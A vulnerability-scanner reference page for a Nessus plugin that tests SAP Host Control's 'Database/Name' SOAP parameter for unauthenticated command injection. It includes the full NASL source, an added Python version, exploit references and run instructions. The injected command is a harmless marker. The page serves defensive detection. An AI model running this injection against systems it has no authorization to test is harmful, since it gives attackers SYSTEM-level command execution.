SAP Host Control SOAP Web Service 'Database/Name' Command Execution (SAP Note 1341333) - Nessus

Critical   Plugin ID: 62293

This page contains detailed information about the SAP Host Control SOAP Web Service 'Database/Name' Command Execution (SAP Note 1341333) Nessus plugin, including the publicly available exploits and PoCs (GitHub, Metasploit, Exploit-DB) that can be used to verify this vulnerability.

Plugin Overview


ID: 62293
Name: SAP Host Control SOAP Web Service 'Database/Name' Command Execution (SAP Note 1341333)
Filename: sap_host_control_note1341333.nasl
Vulnerability Published: 2012-08-05
This Plugin Published: 2012-09-25
Last Modification Time: 2021-01-19
Plugin Version: 1.8
Plugin Type: remote
Plugin Family: CGI abuses
Dependencies: os_fingerprint.nasl, sap_control_detect.nasl, sap_host_control_detect.nasl
Required KB Items [?]: www/sap_control, www/sap_host_control

Vulnerability Information


Severity: Critical
Vulnerability Published: 2012-08-05
Patch Published: 2012-05-01
CVE [?]: N/A
CPE [?]: cpe:/a:sap:netweaver

Synopsis

The remote web server hosts a SOAP service that can be abused to execute arbitrary commands.

Description

The version of SAP Host Control, offered by 'sapstartsrv.exe', fails to sanitize user input to the 'Database/Name' parameter when calling the 'GetDatabaseStatus' SOAP method. A remote, unauthenticated attacker may use this to run commands that, by default, run as SYSTEM.

Note that while this vulnerability affects all platforms, Nessus can only detect vulnerable instances running on Windows.

This is a destructive check (script category ACT_DESTRUCTIVE_ATTACK): it actually executes a command on the target, and Nessus does not remove the global environment variable that the command creates. The plugin will not report this host as vulnerable again until the 'MACHINE' value has been deleted from the registry key:

HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Session Manager\Environment
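The exchange the plugin performs, as an added example in Python (it is not part of the Nessus plugin page or Tenable's code): it builds the same GetDatabaseStatus and GetEnvironment envelopes, enforces the three limits the plugin places on the injected command (31 bytes, no spaces, no double quotes), produces the two 'Database/Name' rounds in the plugin's order, and checks responses the same way. The URLs (Host Control on port 1128, sapcontrol on port 5NN13), the 'NSP' database name, the credentials and the sample responses are assumptions or constructed values; the comment on what dbmcli does with the '!' line is this editor's reading of the plugin's own comments, not something stated on the page. Run with no arguments to print the round-1 request; run with two URLs only against a host you are authorized to test, and note that, like the plugin, it leaves 'MACHINE' set on a vulnerable Windows host.

```python
"""Added example (not Tenable's code): the plugin's SOAP exchange in Python,
inspectable offline; optionally run against a lab host you may test.
Assumed URLs: Host Control http://HOST:1128/, sapcontrol http://HOST:5NN13/."""
import re
import sys
import time
import urllib.error
import urllib.request
from typing import List, Optional
from xml.sax.saxutils import escape

MAX_CMD_LEN = 31                              # limit documented by the plugin
DEFAULT_CMD = "setx/?|findstr/c:COMPAQ|cmd"  # the plugin's command (27 bytes)
MARKER = "MACHINE=COMPAQ COMPUTER"            # variable the command leaves behind
RE_HC_FAULT = re.compile(r"<faultstring>Generic error\.[^<]*</faultstring>")
RE_ENV = re.compile(r"<SAPControl:GetEnvironmentResponse><env>(.*)</env>"
                    r"</SAPControl:GetEnvironmentResponse>", re.S)

def cmd_problem(cmd: str) -> Optional[str]:
    """Why cmd violates the plugin's three limits, or None if it is fine."""
    if len(cmd.encode()) > MAX_CMD_LEN:
        return f"longer than {MAX_CMD_LEN} bytes"
    if " " in cmd or '"' in cmd:
        return "contains a space or double quote"
    return None

def injection_rounds(cmd: str, marker_file: str, host: str = "localhost") -> List[str]:
    """The two Database/Name suffixes the plugin sends (caller prepends 'NSP ')."""
    problem = cmd_problem(cmd)
    if problem:
        raise ValueError(f"bad command: {problem}")
    return [f"-o {marker_file} -n {host}\n!{cmd}\n",  # round 1: login error log -> marker_file
            f"-ic {marker_file}"]                      # round 2: replay it as a command script

def host_control_envelope(db_name: str) -> bytes:
    """GetDatabaseStatus on urn:SAPHostControl; Database/Name is the injection point."""
    items = [("Database/Type", "ada"), ("Database/Password", "password"),
             ("Database/Username", "control"), ("Database/Name", db_name)]
    args = "".join(f"<item><mKey>{k}</mKey><mValue>{escape(v)}</mValue></item>"
                   for k, v in items)
    return ('<?xml version="1.0" encoding="UTF-8"?>'
            '<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/">'
            '<SOAP-ENV:Body><ns1:GetDatabaseStatus xmlns:ns1="urn:SAPHostControl">'
            f"<aArguments>{args}</aArguments></ns1:GetDatabaseStatus>"
            "</SOAP-ENV:Body></SOAP-ENV:Envelope>").encode()

def control_envelope() -> bytes:
    """GetEnvironment on urn:SAPControl, sent before and after the rounds."""
    return ('<?xml version="1.0" encoding="UTF-8"?>'
            '<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/"'
            ' xmlns:SAPControl="urn:SAPControl"><SOAP-ENV:Body>'
            "<SAPControl:GetEnvironment/></SOAP-ENV:Body></SOAP-ENV:Envelope>").encode()

def host_control_accepted(body: str) -> bool:
    """A 'Generic error.' fault is what the plugin expects back from each round."""
    return RE_HC_FAULT.search(body) is not None

def environment_items(body: str) -> Optional[List[str]]:
    """The <item> strings of a GetEnvironmentResponse, or None if rejected."""
    m = RE_ENV.search(body)
    return None if m is None else re.findall(r"<item>([^<]*)</item>", m.group(1))

def soap_post(url: str, envelope: bytes, timeout: float = 15) -> str:
    req = urllib.request.Request(url, data=envelope, method="POST", headers={
        "Content-Type": "text/xml; charset=utf-8", "SOAPAction": '""'})
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return resp.read().decode(errors="replace")
    except urllib.error.HTTPError as err:      # SOAP faults arrive as HTTP 500
        return err.read().decode(errors="replace")

def check(hc_url: str, c_url: str, cmd: str = DEFAULT_CMD) -> bool:
    """Baseline, two rounds, re-check. Like the plugin, this leaves MACHINE set."""
    before = environment_items(soap_post(c_url, control_envelope()))
    if before is None:
        raise RuntimeError("sapcontrol port rejected GetEnvironment")
    if MARKER in before:
        raise RuntimeError("MACHINE already set; result would be ambiguous")
    marker_file = f"{int(time.time())}.txt"    # short name, as in the plugin
    for suffix in injection_rounds(cmd, marker_file):
        if not host_control_accepted(soap_post(hc_url, host_control_envelope("NSP " + suffix))):
            return False
    return MARKER in (environment_items(soap_post(c_url, control_envelope())) or [])

# Constructed responses for offline use; not captures from a real system.
SAMPLE_FAULT = ("<SOAP-ENV:Body><SOAP-ENV:Fault><faultstring>Generic error. Details: sample"
                "</faultstring></SOAP-ENV:Fault></SOAP-ENV:Body>")

def sample_env_response(*items: str) -> str:
    body = "".join(f"<item>{escape(i)}</item>" for i in items)
    return ("<SOAP-ENV:Body><SAPControl:GetEnvironmentResponse>"
            f"<env>{body}</env></SAPControl:GetEnvironmentResponse></SOAP-ENV:Body>")

if __name__ == "__main__":
    if len(sys.argv) == 3:
        print("vulnerable" if check(sys.argv[1], sys.argv[2]) else "not confirmed")
    else:   # no target: show the round-1 request the plugin would send
        print(host_control_envelope("NSP " + injection_rounds(DEFAULT_CMD, "1.txt")[0]).decode())
```

Two design points worth noting: the 'Database/Name' value is XML-escaped before it is placed in the envelope, which the plugin does not do, so a command containing '<' or '&' still reaches the server intact; and the baseline GetEnvironment call is what makes the result unambiguous, since a 'MACHINE' variable already present (for example from an earlier scan) would otherwise be mistaken for a successful injection.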

Solution

Apply the patch referenced in the vendor's advisory.

Public Exploits


Target Network Port(s): N/A
Target Asset(s): N/A
Exploit Available: True (Metasploit Framework, Exploit-DB)
Exploit Ease: Exploits are available

Here's the list of publicly known exploits and PoCs for verifying the SAP Host Control SOAP Web Service 'Database/Name' Command Execution (SAP Note 1341333) vulnerability:

  1. Metasploit: exploit/windows/http/sap_host_control_cmd_exec
    [SAP NetWeaver HostControl Command Injection]
  2. Exploit-DB: exploits/windows/remote/20944.rb
    [EDB-20944: SAP NetWeaver HostControl - Command Injection (Metasploit)]

Before running any exploit against any system, make sure you are authorized by the owner of the target system(s) to perform such activity. Otherwise this would be considered illegal activity.

WARNING: Beware of using unverified exploits from sources such as GitHub or Exploit-DB. These exploits and PoCs could contain malware. For more information, see how to use exploits safely.

Risk Information


CVSS V2 Vector [?]: AV:N/AC:L/Au:N/C:C/I:C/A:C/E:F/RL:OF/RC:C
CVSS Base Score: 10.0 (High)
Impact Subscore: 10.0
Exploitability Subscore: 10.0
CVSS Temporal Score: 8.3 (High)
CVSS Environmental Score: NA (None)
Modified Impact Subscore: NA
Overall CVSS Score: 8.3 (High)


Plugin Source


This is the sap_host_control_note1341333.nasl nessus plugin source code. This script is Copyright (C) 2012-2021 Tenable Network Security, Inc.

#%NASL_MIN_LEVEL 70300
#
# (C) Tenable Network Security, Inc.
#

include('deprecated_nasl_level.inc');
include('compat.inc');

if (description)
{
  script_id(62293);
  script_version("1.8");
  script_set_attribute(attribute:"plugin_modification_date", value:"2021/01/19");

  script_bugtraq_id(55084);
  script_xref(name:"EDB-ID", value:"20944");

  script_name(english:"SAP Host Control SOAP Web Service 'Database/Name' Command Execution (SAP Note 1341333)");
  script_summary(english:"Attempts to set a global environment variable");

  script_set_attribute(attribute:"synopsis", value:
"The remote web server hosts a SOAP service that can be abused to
execute arbitrary commands.");
  script_set_attribute(attribute:"description", value:
"The version of SAP Host Control, offered by 'sapstartsrv.exe', fails to
sanitize user input to the 'Database/Name' parameter when calling the
'GetDatabaseStatus' SOAP method.  A remote, unauthenticated attacker may
use this to run commands that, by default, run as SYSTEM.

Note that while this vulnerability affects all platforms, Nessus can
only detect vulnerable instances running on Windows.

Nessus has not removed the global environment variable that it created.
This plugin will not report this host as vulnerable again until the
'MACHINE' key has been deleted from the registry at :

  HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Session Manager\Environment");
  script_set_attribute(attribute:"see_also", value:"https://service.sap.com/sap/support/notes/1341333");
  script_set_attribute(attribute:"see_also", value:"http://www.contextis.com/research/blog/sap4/");
  script_set_attribute(attribute:"solution", value:"Apply the patch referenced in the vendor's advisory.");
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C");
  script_set_cvss_temporal_vector("CVSS2#E:F/RL:OF/RC:C");
  script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
  script_set_attribute(attribute:"exploit_available", value:"true");
  script_set_attribute(attribute:"metasploit_name", value:'SAP NetWeaver HostControl Command Injection');
  script_set_attribute(attribute:"exploit_framework_metasploit", value:"true");

  script_set_attribute(attribute:"vuln_publication_date", value:"2012/08/05");
  script_set_attribute(attribute:"patch_publication_date", value:"2012/05/01");
  script_set_attribute(attribute:"plugin_publication_date", value:"2012/09/25");

  script_set_attribute(attribute:"plugin_type", value:"remote");
  script_set_attribute(attribute:"cpe", value:"cpe:/a:sap:netweaver");
  script_set_attribute(attribute:"exploited_by_nessus", value:"true");
  script_end_attributes();

  script_category(ACT_DESTRUCTIVE_ATTACK);
  script_family(english:"CGI abuses");

  script_copyright(english:"This script is Copyright (C) 2012-2021 Tenable Network Security, Inc.");

  script_dependencies("os_fingerprint.nasl", "sap_control_detect.nasl", "sap_host_control_detect.nasl");
  script_require_keys("www/sap_control", "www/sap_host_control");

  exit(0);
}

include("audit.inc");
include("global_settings.inc");
include("http.inc");
include("misc_func.inc");
include("webapp_func.inc");

function www_ports()
{
  local_var fields, i, ports;

  ports = get_kb_list("www/*/" + _FCT_ANON_ARGS[0]);
  if (!isnull(ports))
   ports = keys(ports);

  if (isnull(ports) || max_index(ports) <= 0)
    exit(1, "No ports.");

  for (i = 0; i < max_index(ports); i++)
  {
    fields = split(ports[i], sep:"/", keep:FALSE);
    ports[i] = int(fields[1]);
  }

  return ports;
}

function soap(cmd, port, type)
{
  local_var xml;

  if (type == "Host Control")
  {
    xml =
      '<?xml version="1.0" encoding="UTF-8"?>
       <SOAP-ENV:Envelope
         xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/"
         xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
         xmlns:xs="http://www.w3.org/2001/XMLSchema">
         <SOAP-ENV:Body>
           <ns1:GetDatabaseStatus xmlns:ns1="urn:SAPHostControl">
             <aArguments>
               <item>
                 <mKey>Database/Type</mKey>
                 <mValue>ada</mValue>
               </item>
               <item>
                 <mKey>Database/Password</mKey>
                 <mValue>password</mValue>
               </item>
               <item>
                 <mKey>Database/Username</mKey>
                 <mValue>control</mValue>
               </item>
               <item>
                 <mKey>Database/Name</mKey>
                 <mValue>NSP ' + cmd + '</mValue>
               </item>
             </aArguments>
           </ns1:GetDatabaseStatus>
         </SOAP-ENV:Body>
       </SOAP-ENV:Envelope>';
  }
  else
  {
    xml =
      '<?xml version="1.0" encoding="UTF-8"?>
       <SOAP-ENV:Envelope
         xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/"
         xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/"
         xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
         xmlns:xsd="http://www.w3.org/2001/XMLSchema"
         xmlns:SAPControl="urn:SAPControl"
         xmlns:SAPCCMS="urn:SAPCCMS"
         xmlns:SAPHostControl="urn:SAPHostControl"
         xmlns:SAPOscol="urn:SAPOscol"
         xmlns:SAPDSR="urn:SAPDSR">
         <SOAP-ENV:Body>
           <SAPControl:GetEnvironment />
         </SOAP-ENV:Body>
       </SOAP-ENV:Envelope>';
  }

  return http_send_recv3(
    port         : port,
    method       : "POST",
    item         : "/",
    add_headers  : make_array("SOAPAction", '""'),
    data         : xml,
    exit_on_fail : TRUE
  );
}

app = "SAP Host Control";

# This is a blind command injection, and we can only see the results
# on Windows.
os = get_kb_item_or_exit("Host/OS");
if (os && "Windows" >!< os)
  audit(AUDIT_OS_NOT, "Windows");

# Get details of the SAP ports.
ports_hc = www_ports("sap_host_control");
ports_c = www_ports("sap_control");

# We want to try and exploit each Host Control port, and then try to
# confirm on any Control port, so branch.
port_hc = branch(ports_hc);
url = build_url(port:port_hc, qs:"/");

# There are a few restrictions on the command we send:
#
# 1) It must be a maximum of 31 bytes.
# 2) It must not contain any spaces.
# 3) It must not contain any double quotes.
cmd = "setx/?|findstr/c:COMPAQ|cmd";

# The exploit above will execute a section of the command's help page,
# setting the following global environment variable.
env = "MACHINE=COMPAQ COMPUTER";

# We need some names for our exploit. The filename has to be short.
file = unixtime() + ".txt";
host = "localhost";

# Put together regexes to match the SOAP responses we hope for.
re_hc = "<faultstring>Generic error.[^<]*</faultstring>";
re_c1 = "<SAPControl:GetEnvironmentResponse><env>.*</env></SAPControl:GetEnvironmentResponse>";
re_c2 = "<item>" + env + "</item>";

# Narrow down the list of Control ports to ones that we can get the
# environment from. If the environment variable is already set, then
# we can't perform the exploit and know if it worked.
ports_env = make_list();
foreach port (ports_c)
{
  res = soap(port:port, type:"Control");
  if (res[2] !~ re_c1)
    continue;

  if (res[2] =~ re_c2)
    exit(1, "The global environment variable, 'MACHINE', created by this exploit already exists.");

  ports_env = make_list(ports_env, port);
}

if (max_index(ports_env) <= 0)
  exit(1, "All SAP Control ports rejected our 'GetEnvironment' SOAP request.");

# Perform the exploit.
rounds = make_list(
  # Try to log in to the database, making sure the error message ends
  # up in file we chose.
  '-o ' + file + ' -n ' + host + '\n!' + cmd + '\n',

  # Provide the error log as a file of commands for the database.
  '-ic ' + file
);

reqs = make_list();
foreach round (rounds)
{
  res = soap(port:port_hc, type:"Host Control", cmd:round);
  if (res[2] !~ re_hc)
    audit(AUDIT_WEB_APP_NOT_AFFECTED, app, url);

  reqs = make_list(reqs, http_last_sent_request());
}

# Try to find a Control port, from the previously vetted list, that
# now has the global environment variable set.
found = FALSE;
foreach port (ports_env)
{
  res = soap(port:port, type:"Control");
  if (res[2] !~ re_c1)
    continue;

  if (res[2] =~ re_c2)
  {
    found = TRUE;
    reqs = make_list(reqs, http_last_sent_request());
    break;
  }
}

if (!found)
  audit(AUDIT_WEB_APP_NOT_AFFECTED, app, url);

# Report our findings.
report = NULL;
if (report_verbosity > 0)
{
  report =
    '\nNessus was able to perform command injection through the SAP Host' +
    '\nControl SOAP web service. The command executed was :' +
    '\n' +
    '\n  ' + cmd +
    '\n';
}

security_hole(port:port_hc, extra:report);

The latest version of this script can be found in these locations depending on your platform:

  • Linux / Unix:
    /opt/nessus/lib/nessus/plugins/sap_host_control_note1341333.nasl
  • Windows:
    C:\ProgramData\Tenable\Nessus\nessus\plugins\sap_host_control_note1341333.nasl
  • Mac OS X:
    /Library/Nessus/run/lib/nessus/plugins/sap_host_control_note1341333.nasl


How to Run


Here is how to run the SAP Host Control SOAP Web Service 'Database/Name' Command Execution (SAP Note 1341333) plugin on its own via the Nessus web user interface (https://localhost:8834/):

  1. Click to start a New Scan.
  2. Select Advanced Scan.
  3. Navigate to the Plugins tab.
  4. On the top right corner click to Disable All plugins.
  5. On the left side table select CGI abuses plugin family.
  6. On the right side table select SAP Host Control SOAP Web Service 'Database/Name' Command Execution (SAP Note 1341333) plugin ID 62293.
  7. Specify the target on the Settings tab and click to Save the scan.
  8. Run the scan.

Here are a few examples of how to run the plugin in the command line. Note that the examples below demonstrate the usage on the Linux / Unix platform.

Basic usage:

/opt/nessus/bin/nasl sap_host_control_note1341333.nasl -t <IP/HOST>

Run the plugin with audit trail message on the console:

/opt/nessus/bin/nasl -a sap_host_control_note1341333.nasl -t <IP/HOST>

Run the plugin with trace script execution written to the console (useful for debugging):

/opt/nessus/bin/nasl -T - sap_host_control_note1341333.nasl -t <IP/HOST>

Run the plugin using a state file for the target and updating it (useful for running multiple plugins against the same target):

/opt/nessus/bin/nasl -K /tmp/state sap_host_control_note1341333.nasl -t <IP/HOST>


References


BID | SecurityFocus Bugtraq ID: 55084

See also:
  • https://service.sap.com/sap/support/notes/1341333
  • http://www.contextis.com/research/blog/sap4/

Similar and related Nessus plugins:
  • 72258 - SAP Host Agent SOAP Web Service Information Disclosure (SAP Note 1816536)
  • 146272 - SAP BusinessObjects Business Intelligence Platform SSRF Vulnerability (direct check)
  • 40617 - SAP SAPgui MDrmSap ActiveX (mdrmsap.dll) Buffer Overflow
  • 32194 - SAP MaxDB Multiple Vulnerabilities
  • 148400 - SAP NetWeaver AS Java Monitoring Directory Traversal (2234971)
  • 138506 - SAP NetWeaver AS Java Multiple Vulnerabilities
  • 139583 - SAP NetWeaver AS Java DoS (2941315)
  • 150787 - SAP NetWeaver AS JAVA Information Disclosure (3023299)
  • 150717 - SAP NetWeaver AS ABAP XSS (June 2021)
  • 151762 - SAP NetWeaver AS ABAP and ABAP Information Disclosure (3044754)
  • 150718 - SAP NetWeaver AS JAVA Missing XML Validation (3053066)
  • 157848 - SAP NetWeaver AS Desynchronization (ICMAD)
  • 145705 - SAP NetWeaver AS Java and AS ABAP Multiple Vulnerabilities (Jan 2021)
  • 154918 - SAP NetWeaver AS Java Directory Traversal Vulnerability (2547431)
  • 138762 - SAP NetWeaver : Authentication Bypass (CVE-2020-6287) (Direct Check)
  • 36073 - SAP GUI Moniker Creation Multiple Vulnerabilities
  • 145532 - SAP Solution Manager Missing Authentication (2890213)
  • 22309 - SAP DB / MaxDB WebDBM Client Database Name Remote Overflow
  • 25681 - SAP DB / MaxDB Web Server DBM_INTERN_TEST Event Buffer Overflow
  • 29924 - SAP DB / MaxDB Cons Program Arbitrary Command Execution
  • 36163 - SAP GUI KWEdit ActiveX Control SaveDocumentAs() Insecure Method

Version


This page has been produced using Nessus Professional 10.1.2 (#68) LINUX, Plugin set 202205072148.
Plugin file sap_host_control_note1341333.nasl version 1.8. For more plugins, visit the Nessus Plugin Library.
